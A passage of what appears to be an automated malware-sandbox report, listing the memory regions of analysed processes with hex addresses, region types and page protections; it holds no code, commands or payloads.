page read and write
|
||
1ABE88BB000
|
heap
|
page read and write
|
||
2B7A86FB000
|
trusted library allocation
|
page read and write
|
||
1ABE881A000
|
heap
|
page read and write
|
||
2B7B84DB000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
trusted library allocation
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
1ABE678E000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
1ABE67F4000
|
heap
|
page read and write
|
||
1ABE67CA000
|
heap
|
page read and write
|
||
9EC3000
|
direct allocation
|
page execute and read and write
|
||
32A8000
|
heap
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
22571000
|
heap
|
page read and write
|
||
B2C3000
|
direct allocation
|
page execute and read and write
|
||
1ABE8813000
|
heap
|
page read and write
|
||
87BC000
|
trusted library allocation
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
61C36FE000
|
stack
|
page read and write
|
||
C3E000
|
stack
|
page read and write
|
||
2B7A68B0000
|
heap
|
page execute and read and write
|
||
71E7000
|
trusted library allocation
|
page read and write
|
||
728E000
|
stack
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
1E1585E0000
|
heap
|
page read and write
|
||
7FFC000
|
stack
|
page read and write
|
||
1ABE8814000
|
heap
|
page read and write
|
||
A05000
|
heap
|
page read and write
|
||
1ABE69C0000
|
remote allocation
|
page read and write
|
||
6616000
|
heap
|
page read and write
|
||
1ABE882D000
|
heap
|
page read and write
|
||
1ABE8848000
|
heap
|
page read and write
|
||
A1C000
|
heap
|
page read and write
|
||
33DC000
|
heap
|
page read and write
|
||
A30000
|
trusted library allocation
|
page read and write
|
||
1ABE87E1000
|
heap
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
6B80000
|
direct allocation
|
page read and write
|
||
9DE000
|
heap
|
page read and write
|
||
1ABE88A6000
|
heap
|
page read and write
|
||
84C08FF000
|
unkown
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
23303000
|
heap
|
page read and write
|
||
1AE000
|
stack
|
page read and write
|
||
7F10000
|
heap
|
page read and write
|
||
1ABE6783000
|
heap
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
944C000
|
stack
|
page read and write
|
||
2382F000
|
heap
|
page read and write
|
||
4880000
|
heap
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
462E000
|
stack
|
page read and write
|
||
3190000
|
heap
|
page readonly
|
||
1ABE88C7000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
6EAA000
|
stack
|
page read and write
|
||
1ABE8807000
|
heap
|
page read and write
|
||
303C000
|
stack
|
page read and write
|
||
A29000
|
heap
|
page read and write
|
||
1ABE67CC000
|
heap
|
page read and write
|
||
1ABE880A000
|
heap
|
page read and write
|
||
A2B000
|
heap
|
page read and write
|
||
46AE000
|
stack
|
page read and write
|
||
2FB8000
|
heap
|
page read and write
|
||
1ABE86FD000
|
heap
|
page read and write
|
||
A0E000
|
heap
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
1ABE882B000
|
heap
|
page read and write
|
||
2330C000
|
heap
|
page read and write
|
||
7F0E000
|
stack
|
page read and write
|
||
A28000
|
heap
|
page read and write
|
||
52AE000
|
stack
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
1ABE8739000
|
heap
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
94D0000
|
direct allocation
|
page read and write
|
||
5171000
|
heap
|
page read and write
|
||
2362C000
|
heap
|
page read and write
|
||
B4C000
|
heap
|
page read and write
|
||
1ABE69C0000
|
remote allocation
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
2B7C09B7000
|
heap
|
page read and write
|
||
93C0000
|
trusted library allocation
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
6630000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
23697000
|
heap
|
page read and write
|
||
2B7AA19F000
|
trusted library allocation
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
A2C000
|
heap
|
page read and write
|
||
9074000
|
heap
|
page read and write
|
||
1ABE86E5000
|
heap
|
page read and write
|
||
2B7C0971000
|
heap
|
page read and write
|
||
2B7C0C50000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
2B7A6560000
|
heap
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
1ABE86ED000
|
heap
|
page read and write
|
||
5170000
|
heap
|
page read and write
|
||
70B9000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
2B7B81D1000
|
trusted library allocation
|
page read and write
|
||
A59000
|
trusted library allocation
|
page read and write
|
||
6604000
|
heap
|
page read and write
|
||
6B90000
|
direct allocation
|
page read and write
|
||
22C7E000
|
heap
|
page read and write
|
||
220000
|
heap
|
page read and write
|
||
1ABE8814000
|
heap
|
page read and write
|
||
A08000
|
heap
|
page read and write
|
||
734D000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
22585000
|
heap
|
page read and write
|
||
2B7C0950000
|
heap
|
page read and write
|
||
1ABE88A3000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE6737000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
1ABE67CC000
|
heap
|
page read and write
|
||
1ABE8880000
|
heap
|
page read and write
|
||
1ABE88CB000
|
heap
|
page read and write
|
||
A0E000
|
heap
|
page read and write
|
||
2B7AA3D6000
|
trusted library allocation
|
page read and write
|
||
22C14000
|
heap
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
A20000
|
trusted library section
|
page read and write
|
||
2B7A68D5000
|
heap
|
page read and write
|
||
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
2B7AA1B6000
|
trusted library allocation
|
page read and write
|
||
2B7C0629000
|
heap
|
page read and write
|
||
1ABE8887000
|
heap
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
A0F000
|
heap
|
page read and write
|
||
A87000
|
heap
|
page read and write
|
||
A79000
|
heap
|
page read and write
|
||
2B7C0949000
|
heap
|
page read and write
|
||
6604000
|
heap
|
page read and write
|
||
CC3B4FE000
|
stack
|
page read and write
|
||
2B7C0620000
|
heap
|
page read and write
|
||
22DFF000
|
heap
|
page read and write
|
||
1ABE86E4000
|
heap
|
page read and write
|
||
2E6F000
|
stack
|
page read and write
|
||
ECC000
|
stack
|
page read and write
|
||
BCC3000
|
direct allocation
|
page execute and read and write
|
||
6621000
|
heap
|
page read and write
|
||
33C8000
|
heap
|
page read and write
|
||
22585000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
1ABE88E1000
|
heap
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
71F0000
|
trusted library allocation
|
page read and write
|
||
2B7A9D9C000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
CC3C1CA000
|
stack
|
page read and write
|
||
7F3D0000
|
trusted library allocation
|
page execute and read and write
|
||
7ECD000
|
stack
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
1ABE88CA000
|
heap
|
page read and write
|
||
A23000
|
heap
|
page read and write
|
||
662A000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
6624000
|
heap
|
page read and write
|
||
1ABE67CA000
|
heap
|
page read and write
|
||
23B0000
|
heap
|
page read and write
|
||
6603000
|
heap
|
page read and write
|
||
A28000
|
heap
|
page read and write
|
||
1ABE884B000
|
heap
|
page read and write
|
||
6CD0000
|
heap
|
page read and write
|
||
1ABE67FE000
|
heap
|
page read and write
|
||
4881000
|
heap
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
1ABE890C000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page read and write
|
||
F0E000
|
stack
|
page read and write
|
||
2B7C0623000
|
heap
|
page read and write
|
||
1E158410000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
1E1583F0000
|
heap
|
page read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
2B7A6706000
|
heap
|
page read and write
|
||
2C9E000
|
stack
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
1ABE884B000
|
heap
|
page read and write
|
||
1ABE8876000
|
heap
|
page read and write
|
||
229F1000
|
heap
|
page read and write
|
||
1ABE88A6000
|
heap
|
page read and write
|
||
8010000
|
trusted library allocation
|
page execute and read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
2CAB000
|
heap
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
905B000
|
heap
|
page read and write
|
||
6B50000
|
direct allocation
|
page read and write
|
||
1ABE6783000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
A1C000
|
heap
|
page read and write
|
||
1ABE88E0000
|
heap
|
page read and write
|
||
2B7A8255000
|
trusted library allocation
|
page read and write
|
||
F10000
|
trusted library allocation
|
page read and write
|
There are 938 hidden memdumps, click here to show them.